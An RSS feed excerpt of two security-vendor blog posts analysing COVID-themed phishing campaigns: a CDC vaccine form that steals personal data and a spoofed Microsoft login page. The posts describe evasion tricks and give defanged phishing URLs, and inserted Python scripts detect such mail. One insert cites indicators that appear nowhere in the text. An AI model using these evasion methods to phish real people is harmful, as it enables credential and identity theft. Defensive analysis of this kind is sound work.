            <title><![CDATA[Count yourself in for a vaccine phish: new phishing campaign exploits concern over COVID-19 vaccine availability]]></title>
            <link>https://blog.cloudflare.com/cdc-vaccine-phishing/</link>
            <pubDate>Wed, 27 Jan 2021 11:37:00 GMT</pubDate>
            <description><![CDATA[ Area 1 has uncovered a coronavirus vaccine-themed campaign spoofing the CDC. The attack, which originally bypassed Office 365’s email security, uses a number of techniques to bypass normal anti-spoofing and email authentication methods. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in January 2021 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>As news reports began to break concerning COVID-19 vaccine distribution, and which groups the highly-coveted initial doses would go to first, malicious actors quickly mobilized phishing messages that exploited a variety of ongoing concerns regarding the vaccine. These <a href="https://www.computerweekly.com/news/252493523/Surge-in-Covid-19-vaccine-phishing-scams-reported">attacks</a> ranged from information stealing campaigns to Business Email Compromise (BEC) to operations that aimed to infect victim hosts with malware.</p><p>Area 1 Security discovered one such vaccine-themed phishing message in December, amongst a <a href="https://blog.knowbe4.com/theyre-here-covid-19-vaccine-phishes-finally-arrive">number of similar campaigns</a> making false claims regarding the recently announced vaccine. The attack, which was initially missed by Microsoft Office 365’s spam filters, leverages misinformation about COVID-19 vaccine distribution in an attempt to steal Personally Identifiable Information (PII) from targets, which can then be used for identity theft and other fraudulent activity.</p><p>Figure 1 shows the body of the CDC phishing message that the attacker sent to various targeted companies across multiple industries.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TcZUaBFtr9OdM8dORVcuX/f1a75b760a4d5cb78aecf0c288892b71/image1-1.png" />
            
            </figure><p>Figure 1. Vaccine-Themed Phishing Message Impersonating the CDC</p><p>The attacker attempts to solicit sensitive information from the target under the guise of ensuring vaccine availability via a Centers for Disease Control and Prevention (CDC) census-like form. The implication is that filling out the linked form is necessary to secure a spot on the vaccine distribution list.</p><p>Seen in Figure 2, the next wave of this campaign engages in brand spoofing with a new and improved graphic to imitate pharmaceutical and vaccine manufacturer Pfizer in addition to using the CDC logo. This comes as no surprise, as impersonation of Pfizer and the CDC is all too common amid the current nationwide roll-out of the COVID-19 vaccine.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1gheB5gvaX50eBdXgYceTG/235031f1351161f36c6173ce7ff64154/image4-1.png" />
            
            </figure><p>Figure 2. Vaccine-Themed Phishing Message with Pfizer Brand Spoof</p><p>To dupe targets into trusting this fraudulent email, the attacker used Display Name Spoofing to make the message appear as if it was sent from within the targeted company. More specifically, the visible FROM display name is tailored to include the targeted organization’s domain name followed by the words “Secured Mail.”</p><p>An internal email of this nature is not unusual these days, especially given that many companies have established a dedicated COVID-19 information channel for their employees, including email accounts created specifically for communicating COVID-19 issues and updates. But this alone is hardly enough to bypass typical anti-spoofing technology. To go the distance, the attacker used far more evasive techniques.</p><p>When inspecting the raw email headers, the SMTP Envelope ‘MAIL FROM’ address might have you believe the message originated from a legitimate domain, albeit one not related to the targeted company, Pfizer or the CDC. To carry out this tactic, it appears the attacker also presented that legitimate domain as the hostname in the SMTP HELO/EHLO greeting, telling the receiving email server that the message originated there, when in actuality it came from a completely unrelated IP address: 184[.]80[.]233[.]138.</p><p>Further research into this spoofed ‘Envelope From’ domain unveiled the reasoning behind the attacker’s deceptive approach. 
This particular domain’s owner did not configure SPF, DKIM or DMARC, the email authentication protocols leveraged, at least in part, by most <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">email security solutions</a> to help <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">identify phishing messages</a>.</p><p>What’s more, the spoofed domain had been taken offline some months before this campaign was launched, and thus no longer resolved to an IP address. So when the attacker sent their malicious emails from 184[.]80[.]233[.]138, there were no authentication records for the receiving servers to evaluate for the spoofed domain: with no SPF record the SPF result is “none” rather than “fail”, and with no DMARC record there is no policy to enforce, so nothing tipped the targeted companies to any suspicious activity.</p><p>In true cyber criminal fashion, the ruse does not end with this clever use of 184[.]80[.]233[.]138. The fraudsters sent from this particular IP address because it belongs to another legitimate business and therefore does not carry a bad reputation. Hence, reputation-based spam filters and IP blocklists are unlikely to flag this otherwise benign IP.</p><p>It’s clear the attacker went the distance to evade phishing detection. In a very calculated manner they:</p><ul><li><p>Used Display Name Spoofing to fake the visible FROM header</p></li><li><p>Presented the spoofed Envelope From domain as the hostname in the SMTP HELO/EHLO greeting</p></li><li><p>Chose to spoof a domain that did not have email authentication protocols configured and that no longer resolved to an IP address</p></li><li><p>Compromised a legitimate host with a benign IP, and used it to launch their phishing attack</p></li></ul><p>Traditional defenses will continually miss phish like this. In fact, the messages for this campaign successfully passed through Microsoft’s Office 365 native defenses before being identified and stopped by Area 1.</p>
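<p>As an added example that is not part of the original post, the following Python script applies the checks this analysis implies to a raw message: it looks for a domain in the display name that the From address does not carry, compares the Envelope From (Return-Path) domain with the header From domain, extracts the HELO hostname and connecting IP from the topmost Received header, and checks whether the From domain publishes SPF and DMARC records. DNS is replaced by a constructed in-memory table, the two messages are constructed, and the names example-corp.com and defunct-legit.example and the addresses and IPs in them are hypothetical, not the campaign’s. The point a filter has to get right is the last one: a domain with no SPF record yields the result “none”, not “fail”, and with no DMARC record there is no policy to apply, which is why such a message is not rejected by default.</p>

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed stand-in for DNS (hypothetical names, not the campaign's). A name
# missing from both tables does not resolve at all, which is the state the post
# describes for the spoofed Envelope From domain.
DNS_A = {"example-corp.com": "198.51.100.10", "mx.example-corp.com": "198.51.100.25"}
DNS_TXT = {
    "example-corp.com": ["v=spf1 ip4:198.51.100.0/24 -all"],
    "_dmarc.example-corp.com": ["v=DMARC1; p=reject"],
}

# "from <helo> (<rdns> [<ip>])" as most MTAs write it into a Received header.
RECEIVED_RE = re.compile(r"from\s+(?P<helo>\S+)\s+\((?:\S+\s+)?\[(?P<ip>[^\]]+)\]\)")
DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}\b", re.I)


def domain_of(addr):
    return addr.rpartition("@")[2].lower()


def has_spf(domain):
    return any(r.lower().startswith("v=spf1") for r in DNS_TXT.get(domain, []))


def has_dmarc(domain):
    return any(r.lower().startswith("v=dmarc1") for r in DNS_TXT.get("_dmarc." + domain, []))


def triage(raw):
    """Return the reasons a message matches the evasion pattern described above."""
    msg = message_from_string(raw)
    findings = []
    name, from_addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(from_addr)

    # 1. Display Name Spoofing: the friendly name carries a domain the address lacks.
    for d in DOMAIN_RE.findall(name):
        if d.lower() != from_dom:
            findings.append(f"display name claims {d.lower()} but From is {from_dom}")

    # 2. Envelope From (Return-Path) and header From disagree.
    rp_dom = domain_of(parseaddr(msg.get("Return-Path", ""))[1])
    if rp_dom and rp_dom != from_dom:
        findings.append(f"Return-Path domain {rp_dom} differs from From domain {from_dom}")

    # 3. HELO name in the topmost Received header: does it resolve, and which IP connected?
    received = msg.get_all("Received") or []
    m = RECEIVED_RE.search(received[0]) if received else None
    if m and m.group("helo").lower() not in DNS_A:
        findings.append(f"HELO {m.group('helo').lower()} does not resolve (connecting IP {m.group('ip')})")

    # 4. Records for the domain DMARC evaluates (header From). A missing SPF record
    #    yields 'none', not 'fail'; a missing DMARC record leaves nothing to enforce.
    if not has_spf(from_dom):
        findings.append(f"no SPF record for {from_dom}: SPF result 'none', not 'fail'")
    if not has_dmarc(from_dom):
        findings.append(f"no DMARC record for {from_dom}: no policy to enforce")
    return findings


# Constructed messages. The phish mirrors the post: a display name carrying the
# target's domain, a defunct Envelope From domain, and a HELO naming that domain.
PHISH = """\
Return-Path: <covid@defunct-legit.example>
Received: from defunct-legit.example (defunct-legit.example [203.0.113.45])
        by mx.example-corp.com with ESMTP id 4Bxyz
        for <employee@example-corp.com>; Tue, 15 Dec 2020 10:00:00 +0000
From: "example-corp.com Secured Mail" <covid@defunct-legit.example>
To: employee@example-corp.com
Subject: COVID19 CDC Count

Please confirm your place on the vaccine distribution list.
"""

LEGIT = """\
Return-Path: <it-alerts@example-corp.com>
Received: from mx.example-corp.com (mx.example-corp.com [198.51.100.25])
        by mx.example-corp.com with ESMTP id 4Bxyz
        for <employee@example-corp.com>; Tue, 15 Dec 2020 10:00:00 +0000
From: "IT Alerts" <it-alerts@example-corp.com>
To: employee@example-corp.com
Subject: Scheduled maintenance

Nothing to see here.
"""

if __name__ == "__main__":
    for label, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(label, triage(raw) or ["no findings"])
```

<p>Against the constructed phish the script reports four findings (the spoofed display name, the non-resolving HELO, and the missing SPF and DMARC records) and none against the legitimate message; in production the two tables would be replaced by real DNS lookups and the connecting IP would additionally be evaluated against the SPF mechanisms.</p>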
    <div>
      <h3>CDC “Vassine” Count</h3>
      <a href="#cdc-vassine-count">
        
      </a>
    </div>
    <p>In order to complete the purported contact form for receiving the COVID-19 vaccine, the target is prompted to click on the “COVID19 CDC Count” or “Yes / No” button in the message body. Clicking this link will result in the target’s browser loading the malicious webpage <code>hxxps://mail10298[.]buzz/covid/index.php</code>.</p><p>This phishing website, shown below in Figure 3, lures the victim into entering sensitive information, such as their physical address and driver’s license number. Once provided, the attacker could easily steal the victim’s identity or use the information to enable a range of fraudulent schemes.</p><p>Interestingly enough, the attacker misspells vaccine as “vassine,” indicating English is likely not their native language.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6vHkFhmeNnmcF67qHaI9rL/8e19c5b4aa43fbad6cae794f51db289c/image5-2.png" />
            
            </figure><p>Figure 3. “CDC” Contact Phishing Form</p><p>The domain for the phishing website, mail10298[.]buzz, was registered within 24 hours of the phishing campaign’s debut. This quick turnaround is a common tactic employed by threat actors hoping to bait as many victims as possible before their newly registered domain (NRD) is identified as phishing infrastructure.</p><p>NRDs are consistently used by attackers to fool users into taking actions that jeopardize the security of their organization. Leveraging NRDs is also a common, and particularly effective, attacker technique to circumvent an email security gateway. New domains have very little history or presence, which allows them to bypass typical blocklists and reputation filters. In fact, a significant number of campaigns that Area 1 Security catches leverage new domains, which are often ephemeral (active only for about 48 hours or less).</p><p>After performing a DNS lookup on mail10298[.]buzz, and a WHOIS search on the resultant IP address (102[.]130[.]119[.]118), Area 1 found that the attacker used a Virtual Private Server (VPS) service based in Cape Town, South Africa. There were several dozen additional domains that resolved to the same IP address that may also potentially be in use by the attacker. These domains follow a similar pattern, each having a mail-themed second-level domain that contains a random 4-6 digit sequence. However, at the time of our research, these sites had either been parked or taken offline.</p><p>Further investigation of the domain for the phishing website resulted in identification of five subdomains, revealing the domain owner’s use of cPanel:</p><ul><li><p>cpanel[.]mail10298[.]buzz</p></li><li><p>cpcalendars[.]mail10298[.]buzz</p></li><li><p>cpcontacts[.]mail10298[.]buzz</p></li><li><p>webdisk[.]mail10298[.]buzz</p></li><li><p>webmail[.]mail10298[.]buzz</p></li></ul><p>cPanel is a web hosting control panel that allows end users to easily manage their websites. 
All of the domains noted above are default service subdomains for mail10298[.]buzz and were automatically generated by cPanel. Given the creation date for the domains was less than a day before the phishing campaign was underway, it’s safe to assume that the attacker is likely the owner of mail10298[.]buzz.</p><p>However, <i>legitimate</i> sites using cPanel can also be leveraged in phishing attacks. These sites are often the target of various hacks, including compromise via <a href="https://www.tripwire.com/state-of-security/security-data-protection/phishers-send-out-fake-cpanel-security-vulnerabilities-advisory/">cPanel-themed phishing attacks</a>. Compromised cPanel sites can then be used to further more elaborate social engineering scams.</p><p>Gaining unauthorized access to legitimate cPanel accounts provides a stealthy avenue for leveraging benign domains in email-borne attacks, helping to better evade phishing protection solutions.</p><p>Navigating directly to <code>hxxp://mail10298[.]buzz</code> exposed an OPSEC blunder by the attacker — an open directory of the phishing website, as shown in Figure 4.</p>
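<p>The infrastructure pivot described above, as an added example that is not part of the original post: given passive-DNS-style records (name, IP, registration date) the script below clusters the domains that share the phishing site’s IP, flags those registered within a short window before the message was seen, flags mail-themed names with a four to six digit run, and collects cPanel’s default service subdomains for each. The 30-day window, the registration dates, and every domain other than mail10298[.]buzz and its cPanel subdomains are constructed for the example; the seed domain, its subdomains and its IP are the ones the post reports.</p>

```python
import re
from datetime import date

# cPanel's default service subdomains (the labels the post lists).
CPANEL_DEFAULT_LABELS = {"cpanel", "cpcalendars", "cpcontacts", "webdisk", "webmail"}
# Mail-themed registrable label containing a run of 4-6 digits, e.g. mail10298.
MAIL_NUMERIC_RE = re.compile(r"^(?:mail|email|webmail|smtp|mx)[a-z-]*\d{4,6}[a-z-]*$", re.I)
NRD_WINDOW_DAYS = 30  # assumption: "newly registered" means within the last 30 days


def registrable(name):
    """Rightmost two labels; adequate for single-label TLDs such as .buzz."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def is_cpanel_default(name):
    labels = name.lower().split(".")
    return len(labels) >= 3 and labels[0] in CPANEL_DEFAULT_LABELS


def pivot(seed, records, seen_on):
    """Cluster records on the seed domain's IP and annotate each registrable domain.

    records: iterable of dicts with keys name, ip, created (datetime.date).
    seen_on: the date the phishing message was observed.
    """
    seed_base = registrable(seed)
    seed_ip = next((r["ip"] for r in records if registrable(r["name"]) == seed_base), None)
    related = {}
    if seed_ip is None:
        return {"seed_ip": None, "related": related}
    for r in records:
        if r["ip"] != seed_ip:
            continue
        base = registrable(r["name"])
        entry = related.setdefault(base, {"nrd": False, "mail_numeric": False, "cpanel_subdomains": []})
        entry["nrd"] = entry["nrd"] or (seen_on - r["created"]).days <= NRD_WINDOW_DAYS
        entry["mail_numeric"] = bool(MAIL_NUMERIC_RE.match(base.split(".")[0]))
        if is_cpanel_default(r["name"]):
            entry["cpanel_subdomains"].append(r["name"].lower())
    return {"seed_ip": seed_ip, "related": related}


SEEN_ON = date(2020, 12, 15)  # constructed observation date
RECORDS = [
    # The phishing site and its cPanel service subdomains (names and IP from the
    # post; the registration date is constructed to match "less than a day before").
    {"name": "mail10298.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 14)},
    {"name": "cpanel.mail10298.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 14)},
    {"name": "cpcalendars.mail10298.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 14)},
    {"name": "cpcontacts.mail10298.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 14)},
    {"name": "webdisk.mail10298.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 14)},
    {"name": "webmail.mail10298.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 14)},
    # Constructed neighbours on the same VPS IP: one fits the pattern, one does not.
    {"name": "mail4471.buzz", "ip": "102.130.119.118", "created": date(2020, 12, 13)},
    {"name": "oldshop.example", "ip": "102.130.119.118", "created": date(2015, 3, 2)},
    # Constructed record on another IP, which the pivot must ignore.
    {"name": "mail8820.buzz", "ip": "203.0.113.9", "created": date(2020, 12, 14)},
]

if __name__ == "__main__":
    for base, flags in pivot("mail10298.buzz", RECORDS, SEEN_ON)["related"].items():
        print(base, flags)
```

<p>On a shared VPS the IP cluster will also pull in unrelated tenants (the constructed oldshop.example here), so the age and naming flags, not co-hosting alone, are what justify blocking a neighbour.</p>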
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5bqArmfZpLkCzoqVUrxmof/c578e68ad7b2a95c05537e0f22f61159/image2-1.png" />
            
            </figure><p>Figure 4. Index of “CDC” COVID-19 Website</p><p>The main index for the site was publicly available and conveniently contained the archive “covid.zip”. Stored in this ZIP archive were files containing fairly basic HTML and PHP scripts.</p><p>One file in particular caught our interest: process.php. This script, a portion of which is shown below in Figure 5, was most likely taken from open source code for processing HTML forms using PHP. This is evident in the extensive commenting and default values that still remain in the script.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6qcWaT9gqG3VTzQGxo7Bly/8feecc00e20192a4aa6235df3dc9bbd7/image3-1.png" />
            
            </figure><p>Figure 5. Portion of process.php Script</p><p>If a victim submits the information they entered on the form, process.php triggers an HTTP GET request to a generic PHP mailer, which then sends the victim’s information to the attacker, including the victim host’s IP address.</p><p>To thwart these devious vaccine-themed phish, Area 1 Security uses multiple <a href="https://www.cloudflare.com/zero-trust/products/email-security/">advanced anti-phishing techniques</a> that:</p><ul><li><p>Leverage insight gained from early identification of attacker campaign infrastructure, enabling superior detection of emails from spoofed domains and accounts;</p></li><li><p>Analyze email for threat indicators, such as recently registered domains, domain name obfuscation, and look-a-like domains; and</p></li><li><p>Use real-time correlation with associated brand infrastructure to verify authenticity</p></li></ul><p>Area 1 also uses lexical analysis of message body and subject to detect attacks aimed at stealing sensitive information. To find phish, our technology goes beyond validation of SPF, DKIM and DMARC records. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including those with malicious newly registered domains, that other defenses miss.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover the clever tactics seen in this campaign, enabling us to block the messages in real-time instead of waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Phishing Link:</b></p><p>hxxps://mail10298[.]buzz/covid/index.php</p><p><b>Phishing Domain and Subdomains:</b></p><p>mail10298[.]buzz</p><p>cpanel[.]mail10298[.]buzz</p><p>cpcalendars[.]mail10298[.]buzz</p><p>cpcontacts[.]mail10298[.]buzz</p><p>webdisk[.]mail10298[.]buzz</p><p>webmail[.]mail10298[.]buzz</p><p><b>Sender IP:</b></p><p>102[.]130[.]119[.]118</p><p><b>PHP Script:</b></p><p>process.php (SHA256 hash: f2023582408358590d9e1576422b5c13addfa740d0d3c9afd46c0982e45d1149)</p><p><b>Website Image Containing Misspelled Word “Vassine”:</b></p><p>logo.png (SHA256 hash: 5fd24dca599cc5220e7ea7271a89ea660c9d769177e4f07a0cd7d0fa485f9ffa)</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">1wx5Uix3LoNEHnQavaLyqZ</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Phishpoint back in full swing: an infamous Microsoft SharePoint spoof resumes with new tactics]]></title>
            <link>https://blog.cloudflare.com/microsoft-sharepoint-covid19-phishing/</link>
            <pubDate>Fri, 11 Dec 2020 12:03:00 GMT</pubDate>
            <description><![CDATA[ Our researchers detected an updated wave of Microsoft SharePoint phish that are leveraging new COVID-19 restrictions to steal victims’ login information. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in December 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>In August, Area 1 Security researchers identified a Microsoft SharePoint phishing campaign that abused cloud computing services, such as Azure Web Sites, Google Storage, and Amazon Web Services, to host credential harvesters. <b>Most recently, our researchers detected an updated wave of Microsoft SharePoint phish that are leveraging</b> <a href="https://www.nytimes.com/live/2020/11/27/world/covid-19-coronavirus"><b>new COVID-19 restrictions</b></a> <b>to steal victims’ login information.</b></p><p>While this new COVID-19 phishing campaign is incredibly widespread, Area 1 Security noted that a majority of the targets included upper-level management and executives. The attacker may be focusing the bulk of the attacks on these individuals in order to have a better chance of gaining access to sensitive information and potentially infiltrating the target network.</p>
    <div>
      <h3>Just Another Work Email?</h3>
      <a href="#just-another-work-email">
        
      </a>
    </div>
    <p>This new campaign deviates from the previous “Summer Bonus” Microsoft Office 365 phishing campaign by attempting to trick targets into thinking they missed an important update to COVID-19 procedures. As seen in Figure 1, the attacker states that a purported SharePoint-hosted document was sent a week prior, creating a sense of urgency in order to lure targets into clicking on the provided link.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/10ew2nlngWsc3BH6Gt1PED/1e1c5e0e13f2f7f88e12c53bec1cadd2/image3-2.png" />
            
            </figure><p>Figure 1. SharePoint Phishing Email</p><p>The new COVID-19 campaign contains many of the same hallmarks as the previous bonus-themed phish, such as tailoring each message to include the target’s email and company name throughout the body of the message and in the spoofed sender address. However, this time around, the attacker improved upon their formatting to appear more convincing.</p><p>As with the previous PhishPoint campaign, the attacker continues to use Virtual Private Servers (VPS) to send their phishing messages. Area 1 Security researchers identified roughly 100 unique sender addresses associated with this “COVID Requirements” campaign. The attacker used three main VPS services: CrownCloud, HostWinds, and MGNHost.</p><p>The versatility of a VPS allows the attacker to remain anonymous and also provides the ability to continually pivot to new infrastructure as soon as a phishing domain or IP address is identified as malicious.</p><p>To a lesser extent, the attackers also sent the phishing messages through a leading transactional and marketing email provider, SendGrid. This company is known for its presence, experience and expertise in email delivery. As a result, SendGrid’s domain is commonly whitelisted. For this reason, threat actors will often launch their phishing campaigns by abusing reputable providers like this.</p><p>Not only that, but with SendGrid the message will easily pass email authentication: it is sent from the provider’s own servers, so SPF and DKIM confirm that the message came from where it claims to come from. Those checks validate the sending source, not whether the content is malicious. This demonstrates just how <a href="https://www.area1security.com/resources/data-sheet-why-dmarc-spf-dkim-limited-against-phishing/">DMARC fails at stopping phishing attacks</a>.</p><p>The use of SendGrid is also a clever way to circumvent Secure Email Gateways (SEGs). SEGs that depend predominantly on email authentication and sender reputation (SPF, DKIM, DMARC and sender IP or domain reputation) will miss these types of phishing attacks.</p>
    <div>
      <h3>Analysis of Spoofed Microsoft Login Page</h3>
      <a href="#analysis-of-spoofed-microsoft-login-page">
        
      </a>
    </div>
    <p>Disguised as a simple “Open” button, the link in the message body leads to a spoofed Microsoft login page hosted on various cloud computing platforms, including Amazon Web Services, Google App Engine (appspot.com), and Firebase. These top tier, widely-used cloud services provide attackers the perfect platform for hosting their malicious content, all the while flying under the radar of legacy vendor email security solutions.</p><p>An example link, hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#redacted@redacted.com, shown in the address bar in Figure 2, further demonstrates the targeted nature of the attacks. The redacted information in the URL fragment is the target’s company email address, which the page reads in order to prepopulate the username field. To further add legitimacy, this spoofed site is nearly identical to the real Microsoft login page. The only discernible difference is the inclusion of the word “Outlook.”</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2UkOsrJOZ4IcqPO6dTjodI/30aad0c95ad609443b21b3ab1b499a7e/image1-3.png" />
            
            </figure><p>Figure 2. Spoofed Microsoft Login Portal</p><p>Figure 3 shows a portion of the source code of the spoofed login page. This section of code consists of JavaScript that attempts to mimic the functionality of the legitimate Microsoft login page.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6WujgZRceknQImQfcIflzs/f6c566112c2dd009d21a214167595a5b/image2-2.png" />
            
            </figure><p>Figure 3. JavaScript of Spoofed Login Page</p><p>The code calls a custom function responsible for extracting the victim’s email from the URL and prepopulating it in the account username field. In this function the actor left a portion of commented code (presumably used by the developer of the code for testing purposes) as highlighted in Figure 4.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1bQlfWsHPafn9QTDswuYbv/016fc321f76f4a6f78d0c62623937d1c/image6-2.png" />
            
            </figure><p>Figure 4. Custom Function Containing Commented Code</p><p>The commented code specifies a link that contains the string “office1withemail” in the URL path. Pivoting on this code, Area 1 Security researchers identified a massive number of phishing attacks, dating back to at least April 2019. These attacks leveraged a large variety of phishing themes, used numerous cloud hosting and VPS providers to send the messages, and targeted a slew of industry verticals.</p><p>It's possible these attacks are the work of a single group. However, given the nature and pervasiveness of the activity - and the fact that all of the attacks used JavaScript that contained the same commented code - a phishing kit may be at play.</p><p>If the target enters their password, it is posted to a website hosted on Microsoft Azure Web Sites, for example hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php, as revealed in Figure 5.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ZnDKBssQT8MxCzPBie6nL/4a070855d6c2b86a8ffa67a0ff99dc39/image5-3.png" />
            
            </figure><p>Figure 5. HTTP Post of Victim Credentials</p><p>After the credentials are entered, the .ldsddddd function above displays a spinning circle next to the “Sign In” button, making it appear as if the credentials are being validated. After several seconds have passed, the error message shown in Figure 6 is displayed.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/263zPzyWhhvnNrPQvy9GQI/d51ef834c60d20d35ce80b4d6229012a/image4-3.png" />
            
            </figure><p>Figure 6. Error Message Displayed After Credentials Are Entered</p><p>No matter what value is entered, the victim is led to believe they provided an incorrect password. To reduce suspicion, if the victim clicks on the “Forgot my password” link, the browser redirects to the real Microsoft password reset page.</p><p>This pervasive “COVID Restrictions” campaign is an ongoing threat to many individuals and businesses alike. The use of VPS and leading email service providers, as well as abuse of multiple cloud services throughout several stages of the attack, make it a particularly difficult campaign to detect.</p><p>To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this. In fact, Microsoft’s native Office 365 email security failed to stop this phishing attack despite these red flags.</p><p>Fortunately, Area 1 Security detected this stealthy campaign and stopped these phish from reaching our customers’ inboxes.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
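<p>The links in this campaign, like those in the 2023 report indicators earlier on this page, carry the victim’s identity in the URL fragment (“#@company.tld” or a full address) or in a query parameter such as e, eid or username, sometimes base64-encoded, so the spoofed page can pre-fill the username field, and they sit on legitimate cloud hosts. The following Python example is added here and is not from the original post or from Area 1’s tooling: it refangs a URL as written in an IOC list, recovers the embedded target, records whether the host is one of the platforms named above, and flags the kit’s handler.php endpoint. The hosting suffix list is an assumption built from the indicators on this page, and the sample target address employee@example-corp.com is constructed.</p>

```python
import base64
import re
from urllib.parse import urlsplit, unquote

# Hosting platforms this campaign abused, as a suffix list built from the
# indicators on this page (an assumption to extend, not an authoritative list).
CLOUD_HOST_SUFFIXES = (".appspot.com", ".azurewebsites.net", ".amazonaws.com", ".web.app")
CLOUD_HOSTS_EXACT = ("storage.cloud.google.com",)
# Query keys seen on this page carrying the victim identifier.
TARGET_KEYS = ("e", "eid", "username")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def refang(url):
    """Turn the defanged forms used in IOC lists (hxxp, [.], \\[.\\]) back into a URL."""
    url = url.replace("hxxp", "http", 1)
    return url.replace("\\[.\\]", ".").replace("[.]", ".")


def decode_target(value):
    """Recover the victim identifier from a fragment or query value.

    Accepts '@company.tld', a plaintext address, or base64 of an address
    (standard or URL-safe alphabet, with or without padding). Returns None
    for anything else, so unrelated fragments are not misreported.
    """
    value = unquote(value)
    if value.startswith("@") or EMAIL_RE.match(value):
        return value
    b64 = value.replace("-", "+").replace("_", "/")
    b64 += "=" * (-len(b64) % 4)
    try:
        decoded = base64.b64decode(b64, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if EMAIL_RE.match(decoded) else None


def analyze(url):
    """Classify one link: host, hosting platform, embedded target, kit handler."""
    u = urlsplit(refang(url))
    host = (u.hostname or "").lower()
    target = decode_target(u.fragment) if u.fragment else None
    # Split the query by hand: parse_qs would turn a base64 '+' into a space.
    for pair in u.query.split("&"):
        key, _, val = pair.partition("=")
        if target is None and key in TARGET_KEYS and val:
            target = decode_target(val)
    cloud_hosted = host.endswith(CLOUD_HOST_SUFFIXES) or host in CLOUD_HOSTS_EXACT
    kit_handler = u.path.lower().endswith("handler.php")
    return {
        "host": host,
        "cloud_hosted": cloud_hosted,
        "target": target,
        "kit_handler": kit_handler,
        # A cloud host alone is not a verdict: the same platforms serve legitimate
        # content. A pre-filled victim identifier or the kit's POST endpoint is.
        "suspicious": target is not None or kit_handler,
    }


# Constructed samples: indicators from this page with the target placeholder
# replaced by a hypothetical address, plus one benign URL for contrast.
B64_TARGET = base64.b64encode(b"employee@example-corp.com").decode()
SAMPLES = [
    "hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#@example-corp.com",
    "hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php",
    "https://login\\[.\\]microsoftofficeonlineservices\\[.\\]com?e=" + B64_TARGET,
    "https://login.microsoftonline.com/",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze(s))
```

<p>The recovered target is the useful output for incident response: it tells you which mailbox received the lure, whether or not the user clicked, and a URL that carries one of your addresses in this position is worth hunting for across proxy logs even when the host itself has a clean reputation.</p>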
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
